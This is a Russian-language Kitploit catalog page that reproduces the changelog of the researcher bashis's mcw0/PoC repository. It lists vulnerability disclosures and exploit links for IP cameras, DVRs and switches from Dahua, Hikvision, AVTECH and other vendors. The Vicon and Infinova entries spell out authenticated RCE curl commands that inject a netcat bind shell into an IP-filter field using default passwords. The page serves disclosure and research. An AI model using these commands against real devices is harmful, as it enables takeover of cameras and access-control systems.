Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC — Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported. | Kitploit
Инструменты/GitHubGitHub/mcw0/poc
Embedded Systems SecurityReconnaissanceIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingBinary Exploitation
GitHubmcw0/poc

PoC

Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.

Репозиторий
7833073 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC

разные PoC — интернет (не)безопасных вещей

Определённо стоит почитать про эти паршивые (не)безопасные вещи: https://ipvm.com/reports/security-exploits

Hikvision CVE-2021-36260

2021-10-19

Вся заслуга принадлежит Watchful_IP (https://watchfulip.github.io/)

https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py

Dahua CVE-2021-33044, CVE-2021-33045

2021-10-06

Подробности: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

PoC: https://github.com/mcw0/DahuaConsole

2021-09-06

Два независимых обхода аутентификации.

Из-за очень высокой вероятности очередного «массового взлома Dahua» я буду держать детали Full Disclosure до 6 октября 2021 года.

Настоятельно рекомендую до этого времени обновить прошивку.

https://www.dahuasecurity.com/support/cybersecurity/details/957

Dahua DES/3DES шифрование/дешифрование, утечки учётных данных NetSDK, облачные ключи/пароли, PoC DHP2P

2020-05-09

  • Сломанная реализация аутентификации Dahua DES/3DES и PSK
  • Уязвимость: Dahua NetSDK раскрывает учётные данные (первые 8 символов) всех клиентов в запросе REALM при использовании протоколов DVRIP и DHP2P
  • PoC: добавлен простой слушатель DVRIP на TCP/37777 для отображения расшифрованных учётных данных в открытом виде
  • Уязвимость: утечка учётных данных облачного протокола Dahua DHP2P
  • Уязвимость: захардкоженные облачные ключи/пароли DHP2P для 23 различных провайдеров
  • PoC: доступ к устройствам внутри DHP2P Cloud. PoC сделан только для Dahua IMOU

https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py

Обновление: Dahua-JSON-Debug-Console-v2.py

2020-02-29

  • Добавлена опция 'setDebug'; теперь вывод из Debug Console в VTO/VTH должен начать появляться
  • Добавлен '--discover' — многоадресный поиск устройств или прямое зондирование устройства (--rhost 192.168.57.20) через UDP/37810
  • Добавлен '--dump {config,service}' для дампа конфигурации или сервисов на удалённом хосте без входа в Debug Console

https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py

Обновление

2020-02-15

На этой неделе установлен контакт с Dahua PSIRT; детали, PoC и доказательства для 23 различных облачных провайдеров были переданы. Я также буду следовать новой практике Google Zero «Policy and Disclosure: 2020 Edition» (поскольку для меня это имеет смысл), то есть опубликую материал через 90 дней, независимо от того, выпустит ли Dahua обновления до или после 09.05.2020 19:00 UTC (9 мая 2020, 19:00 UTC).

Dahua, пожалуйста, исправьте и сделайте обновления доступными до этой даты...

Ссылка: Google Zero «Policy and Disclosure: 2020 Edition»: https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html

Несколько часов назад

2020-02-10

Я только что раскрыл утечки учётных данных (в конечном счёте попадающих в открытый вид) из Dahua SDK в Dahua PSIRT; посмотрим, как они воспримут эту информацию. Довольно скверно, когда в этом замешано более 20 разных облачных провайдеров... 90 дней отсчитываются с сегодняшнего дня.

Инструменты

2020-01-20

Создан новый репозиторий, куда я планирую выкладывать некоторые инструменты.

https://github.com/mcw0/Tools

Первым выходит: Dahua-JSON-Debug-Console-v2.py

  • Портировано на Python 3
  • Исправлены некоторые баги и скорректирован код
  • Добавлена поддержка DVRIP (TCP/37777) [Примечание: некоторые JSON-команды, работающие с DHIP, ничего не возвращают через DVRIP]
  • encode/decode в latin-1, нам могут понадобиться нетронутые символы между 0x00 - 0xff
  • Улучшен 'debug' с опцией hexdump

Axis Communications

2019-10-06 (старьё)

Анонимно определяет модель и версию прошивки устройств Axis (1998 - 2019).

https://github.com/mcw0/PoC/blob/master/axis-detect.py

Realtek Managed Switch Controller (RTL83xx) PoC

2019-08-20

https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py

Несколько уязвимостей во множестве сетевых коммутаторов

2019-08-06

https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches

Все технические подробности вместе с Python PoC будут опубликованы здесь 20 августа 2019 года.

LifeSafety Power

2019-05-15

Множественные переполнения стека, RCE, раскрытие имени пользователя/пароля в открытом виде и другое

https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py

Dahua DHIP JSON Debug Console (с аутентификацией)

2019-04-10

Этот скрипт будет использовать бинарный P2P-протокол Dahua 'DHIP', работающий на обычных HTTP/HTTPS-портах и TCP/5000.

Будет подключаться к внутренней 'Debug Console' устройств Dahua через JSON (того же типа, что и прежняя отладка на TCP/6789)

https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py

Развлекайтесь, bashis

VDOO

2019-01-23

Приветствую, давно ничего не публиковал...

Я всё ещё занимаюсь исследованиями, но новость в том, что я также пытаюсь работать с VDOO (https://www.vdoo.com/) по взаимодействию с вендорами, и это, к сожалению, несколько задержало мой процесс Full Disclosure.

В любом случае, вскоре здесь, на моём GitHub, появятся несколько интересных исследований в формате Full Disclosure.

Благодаря сотрудничеству с VDOO я могу заниматься тем, что мне нравится, и не тратить время на вендоров, которые (не хотят | не понимают | хотят игнорировать | хотят затянуть | что угодно).

Последние находки — кое-что про Reolink (https://reolink.com/), что вы найдёте здесь: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.

AVTECH Corporation

2018-06-18

AVTECH {DVR/NVR/IPC}: переполнение кучи, IPCP API, RCE

https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt

https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py

Reolink Digital Technology Co., Ltd.

2018-06-03

Reolink {IPC} RCE (с аутентификацией)

https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py

Shenzhen TVT Digital Technology Co. Ltd

2018-04-09

Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py

AVTECH

2018-03-05

AVTECH {DVR/NVR/IPC} RCE с аутентификацией

https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py

Geovision Inc.

2018-02-01

Geovision Inc. IP Camera/Video/Access Control — множественное удалённое выполнение команд — множественное переполнение стека — double free — несанкционированный доступ https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt

PoC удалённого выполнения команд для IP-камер и видеосерверов Geovision Inc. https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py

Herospeed

2018-01-22

Демон Herospeed TelnetSwitch работает на TCP/787 и позволяет включить telnetd. Небольшое переполнение стека позволяет перезаписать динамически генерируемый пароль и включить telnetd. https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py

Foscam

2018-01-15

Небольшая обёртка OpenSSL для перебора различных ключей шифрования/дайджестов и шифров в образах прошивок Foscam IPC. https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py

Деобфускация строк/логина/пароля/криптоключа в различных бинарниках и библиотеках Foscam IPC https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py

Vitek RCE и раскрытие информации (и, возможно, других OEM) 0-day

2017-12-22

https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt

Удалённая форматная строка в стеке в бинарнике 'nsd' от нескольких OEM (0-day)

2017-12-14

https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt

Картинка здесь: http://62.43.36.107:50021/Public/CCTV/GWSecu/GWSecu%20Updater%20para%20c%C3%A1maras/Firmware%20para%20c%C3%A1mara%20domo/

Бэкдор на форматной строке, не вызывающий падения — Proof of Concept

2017-12-05

https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c

Vicon Security RCE (с аутентификацией)

2017-12-03

// Enable 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// Add to 'IP Filter' and execute

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// Disable 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// Remove from 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

Infinova RCE (с аутентификацией)

2017-12-03

// Enable 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// Add to 'IP Filter' and execute

curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// Disable 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// Remove from 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

Примечание: почти уверен, что есть и другие OEM, у которых то же самое.

Axis Communications

2017-12-01 Axis Communications MPQT/PACS — переполнение кучи и утечка информации https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt

Stunnel

2017-11-13 Обратная stunnel TLSv1 privacy shell https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt

Vivotek

2017-11-13 IP-камеры Vivotek — удалённое переполнение стека https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt

Uniview

2017-10-29 PoC для RCE и экспорта конфигурации Uniview https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt

Axis

2017-10-19 Один старый забытый фаззинг из Q3/2016, который привёл к RCE (PoC: удалённая оболочка с обратным подключением) и удалённому чтению /etc/shadow. Было сообщено в Axis и исправлено в Q3/2016; публикую это здесь сейчас, так как это может быть хорошей подсказкой. https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE

DAHUA

2017-10-17 Включение / отключение Telnetd в Dahua (для более новых версий прошивки) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py

2017-05-03

Публичный повторный релиз PoC бэкдора Dahua https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py

2017-03-20

С учётом моих новых знаний об уязвимых устройствах, которых там невероятно много — более 1 миллиона устройств Dahua / OEM, — причём эти знания взяты из отчёта NSFOCUS и моих собственных исследований на shodan.io.

Обладая этими знаниями, я не буду публиковать Python PoC, как я говорил ранее про 5 апреля, поскольку в этом нет необходимости: PoC уже подтверждён IPVM и другими независимыми исследователями безопасности.

Тем не менее, я готов поделиться PoC с серьёзными исследователями безопасности, если это необходимо; пожалуйста, напишите мне лично и чётко укажите, кто вы, чтобы я не принял вас за попрошайку, которых я игнорирую.

Отчёт NSFOCUS: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/

/bashis


Вы заметили временные метки на патчах Dahua? Посмотрите скриншоты: http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png

https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png

В списке не только NVR/DVR/IPC/HDCVI

Домофонная система тоже — VTO2000A был подтверждён http://www1.dahuasecurity.com/au/products/vto2000a-762.html

Скачать инструмент